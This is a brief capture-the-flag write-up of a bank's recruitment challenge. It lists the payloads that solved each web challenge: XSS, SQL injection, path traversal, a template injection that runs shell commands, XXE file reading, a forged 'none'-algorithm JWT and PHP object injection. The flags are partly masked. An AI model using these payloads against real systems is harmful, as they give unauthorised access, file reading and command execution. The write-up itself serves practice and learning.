Description

CTF_{BGK} was the chellenge for the people which are interested in working for BGK Bank. I did it just for improving myself and practice security skills.

Challenges

Xcross-this - XSS - CTF_{Str0ngInMa************Are}

\unicode{<img src=1 onerror='document.getElementById("LogOut").click()'>}

Database - SQLi - CTF_{0w0cow3C********}

?query=1%27%29+union+SELECT+title%2C+text%2C+hidden%2C+image+FROM+offers+--

deardir - LFI - CTF_{ThisIsT******}
```
?file=../../../tmp/flag
```

Welcome, I, you - SSTI - CTF_{OhGo0d******}

python

/greeting/%7B%7Brequest.application.__globals__.__builtins__.__import__('os').popen('cat%20flag.txt').read()%7D%7D

External Entity - XXE - CTF_{Externa********}

xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE x [
<!ENTITY x SYSTEM "/tmp/flag">
]>
<creds>
    <user>admin &x;</user>
    <pass>admin</pass>
</creds>

I'm brOken' - JWT with nOnE alg - CTF_{QnIwa2V************==}, (just modify alg = nOnE and username = admin)

eyJhbGciOiJuT25FIiwidHlwIjoiSldUIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNzEwNTg3MTE1fQ.D978VBZPH0Z4qxHIgRkdt-4xtaxPdAAEHs3UpFJ9hX8

Why s0 deserious? - CTF_{0hYouSe**********}

?data=O%3A8%3A%22FileRead%22%3A1%3A%7Bs%3A4%3A%22file%22%3Bs%3A17%3A%22%2Fvar%2Fwww%2Fflag.txt%22%3B%7D

PotluckCTF2023

IrisCTF2024

BGK

Description

Challenges

Description ​

Challenges ​

Description

Challenges